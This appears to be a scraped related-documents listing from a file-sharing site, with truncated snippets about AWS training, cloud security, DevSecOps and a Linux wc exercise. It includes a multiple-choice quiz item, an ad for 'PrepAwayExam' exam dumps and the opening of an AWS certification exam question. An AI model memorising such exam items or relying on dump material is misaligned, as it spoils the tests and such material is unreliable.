epldt Web Builder Security March 2017 TABLE OF CONTENTS Overview... 4 Application Security... 5 Security Elements... 5 User & Role Management... 5 User / Reseller Hierarchy Management... 5 User Authentication
More informationAmazon Web Services (AWS) Training Course Content
Amazon Web Services (AWS) Training Course Content SECTION 1: CLOUD COMPUTING INTRODUCTION History of Cloud Computing Concept of Client Server Computing Distributed Computing and it s Challenges What is
More informationAWS Service Catalog. User Guide
AWS Service Catalog User Guide AWS Service Catalog: User Guide Copyright 2017 Amazon Web Services, Inc. and/or its affiliates. All rights reserved. Amazon's trademarks and trade dress may not be used in
More informationHow can you implement this through a script that a scheduling daemon runs daily on the application servers?
You ve been tasked with implementing an automated data backup solution for your application servers that run on Amazon EC2 with Amazon EBS volumes. You want to use a distributed data store for your backups
More informationPrepAwayExam. High-efficient Exam Materials are the best high pass-rate Exam Dumps
PrepAwayExam http://www.prepawayexam.com/ High-efficient Exam Materials are the best high pass-rate Exam Dumps Exam : SAA-C01 Title : AWS Certified Solutions Architect - Associate (Released February 2018)
More informationA Cloud-based Architecture for Processing 3D Mars Terrain
OnSight A Cloud-based Architecture for Processing 3D Mars Terrain Parker Abercrombie Jet Propulsion Laboratory, California Institute of Technology 2016 California Institute of Technology. Government sponsorship
More informationI'm Andy Glover and this is the Java Technical Series of. the developerworks podcasts. My guest is Brian Jakovich. He is the
I'm Andy Glover and this is the Java Technical Series of the developerworks podcasts. My guest is Brian Jakovich. He is the director of Elastic Operations for Stelligent. He and I are going to talk about
More information1. What statistic did the wc -l command show? (do man wc to get the answer) A. The number of bytes B. The number of lines C. The number of words
More Linux Commands 1 wc The Linux command for acquiring size statistics on a file is wc. This command provides the line count, word count and number of bytes in a file. Open up a terminal, make sure you
More informationAWS Integration Guide
AWS Integration Guide Cloud-Native Security www.aporeto.com AWS Integration Guide Aporeto integrates with AWS to help enterprises efficiently deploy, manage, and secure applications at scale and the compute
More informationImmutable Servers. Building a deployment pipeline and deploying to EC2 Spot
Immutable Servers Building a deployment pipeline and deploying to EC2 Spot Instances @james_ridgway Who am I? My name is James Ridgway I work on the Dev side of DevOps Head of Platform and Data Science
More informationDevSecOps Why Aren t You Doing It? Brian Liceaga, CISSP 1
DevSecOps Why Aren t You Doing It? Brian Liceaga, CISSP 1 Agenda State of DevOps Value of DevOps Benefitting from DevOps DevSecOps What you can do as InfoSec 2 The State of DevOps - 2017 Automation is
More informationAWS Administration. Suggested Pre-requisites Basic IT Knowledge
Course Description Amazon Web Services Administration (AWS Administration) course starts your Cloud Journey. If you are planning to learn Cloud Computing and Amazon Web Services in particular, then this
More information